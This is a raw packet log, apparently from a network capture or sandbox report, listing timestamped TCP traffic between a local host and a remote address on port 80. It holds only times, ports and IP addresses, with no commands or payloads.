Jan 12, 2022 13:02:05.484179020 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.484220982 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.484280109 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.484321117 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.484384060 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.484508991 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.484559059 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.484572887 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.484683990 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.484728098 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.484821081 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.484889984 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.484935045 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.485013962 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.485135078 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.485184908 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.485379934 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.491977930 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.492033958 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.492048025 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.492053032 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.492117882 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.533806086 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.533830881 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.533886909 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.535649061 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.535696983 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.535742998 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.535773039 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.535984039 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.536005020 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.536040068 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.536128044 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.536150932 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.536170006 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.536264896 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.536309004 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.536381960 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.536545038 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.536586046 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.536653042 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.536789894 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.536843061 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.536860943 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.536988020 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.537033081 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.537153006 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.537476063 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.537534952 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.537575006 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.537676096 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.537719965 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.537729979 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.537806988 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.537869930 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.537928104 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.538937092 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.538979053 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.539006948 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.539091110 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.539134979 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.544105053 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.544163942 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.544182062 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.544215918 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.544264078 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.544308901 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.544465065 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.544482946 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.544528961 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.586024046 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.586062908 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.586088896 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.586148024 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.587776899 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.587811947 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.587836981 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.587867975 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.587896109 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.588088036 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.588114977 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.588176012 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.588223934 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.588613987 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.588675976 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.588814020 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.588958025 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.588989019 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.589009047 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.589024067 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.589076042 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.589320898 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.589375019 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.589440107 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.589493990 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.589570045 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.589586973 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.589632034 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.589653969 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.589728117 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.589792013 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.589814901 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.590030909 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.590089083 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.590121984 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.590157032 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.590167046 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.590329885 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.590363979 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.590400934 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.590478897 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.590543985 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.590619087 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.590676069 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.590739012 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.590950966 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.590976000 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.591047049 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.591253042 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.591286898 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.591320038 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.591358900 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.591490984 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.591555119 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.591631889 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.591666937 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.591737986 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.591784000 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.591897011 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.591958046 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.592004061 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.596309900 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.596391916 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.596398115 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.596425056 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.596494913 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.596657991 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.596688032 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.596749067 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.597032070 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.597058058 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.597119093 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.597134113 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.597230911 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.597279072 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.638353109 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.638384104 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.638442993 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.640109062 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.640146971 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.640211105 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.640225887 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.640489101 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.640552044 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.640680075 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.640706062 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.640763998 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.640863895 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.640991926 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.641047001 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.641251087 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.641376019 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.641437054 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.641763926 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.641817093 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.641875029 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.642082930 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.642139912 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.642144918 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.642335892 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.642390966 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.642405987 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.642463923 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.642719984 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.642784119 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.642786026 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.642854929 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.642904043 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.642973900 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.643167973 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.643225908 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.643229961 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.643359900 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:05.643413067 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.643511057 CET	49751	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:05.697165012 CET	80	49751	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:06.295106888 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:06.347307920 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:06.347399950 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:06.347887993 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:06.440695047 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:06.844825029 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:06.845170975 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:06.845259905 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:06.845278025 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:06.845300913 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:06.845379114 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:06.845434904 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:06.845561028 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:06.845634937 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:06.846254110 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:06.846323013 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:06.846363068 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:06.846381903 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:06.846580982 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:06.846640110 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:06.898086071 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:06.898149967 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:06.898190975 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:06.898251057 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:06.898308039 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:06.898313046 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:06.898348093 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:06.898355007 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:06.898406982 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:06.898519993 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:06.898576975 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:06.898701906 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:06.898761988 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:06.898852110 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:06.898891926 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:06.898904085 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:06.898977995 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:06.899132013 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:06.899187088 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:06.899238110 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:06.899297953 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:06.899317980 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:06.951492071 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:06.951528072 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:06.951551914 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:06.951576948 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:06.951601982 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:06.951617956 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:06.951637983 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:06.951663017 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:06.951664925 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:06.951667070 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:06.951695919 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:06.951708078 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:06.951730013 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:06.951747894 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:06.951756954 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:06.951769114 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:06.951783895 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:06.951812029 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:06.951821089 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:06.951837063 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:06.951917887 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:06.951961040 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:06.951968908 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:06.952006102 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:06.952069044 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:06.952178955 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:06.952296019 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:06.952343941 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:06.952430964 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:06.952477932 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:06.952519894 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:06.952644110 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:06.952872038 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.003972054 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.004009962 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.004093885 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.004154921 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.004204988 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.004230022 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.004292011 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.004302979 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.004420996 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.004443884 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.004519939 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.004544020 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.004554987 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.004663944 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.004815102 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.004858017 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.004920959 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.004970074 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.005022049 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.005177975 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.005332947 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.005372047 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.005424023 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.005431890 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.005469084 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.005561113 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.005676985 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.005712032 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.005754948 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.005989075 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.006007910 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.006042004 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.006146908 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.006187916 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.006217957 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.006280899 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.006794930 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.057245970 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.057298899 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.057339907 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.057367086 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.058592081 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.058635950 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.058696985 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.058723927 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.058765888 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.058778048 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.059041977 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.059092999 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.059098005 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.059138060 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.059216976 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.059263945 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.059753895 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.059798002 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.059839010 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.059883118 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.059933901 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.059962988 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.060003996 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.060240984 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.060282946 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.060290098 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.060362101 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.060395956 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.060483932 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.060525894 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.060580015 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.060633898 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.060642958 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.060786963 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.060834885 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.060899973 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.060975075 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.061055899 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.061068058 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.061110020 CET	80	49752	185.189.12.123	192.168.2.3
Jan 12, 2022 13:02:07.061120987 CET	49752	80	192.168.2.3	185.189.12.123
Jan 12, 2022 13:02:07.061186075 CET	49752	80	192.168.2.3	185.189.12.123
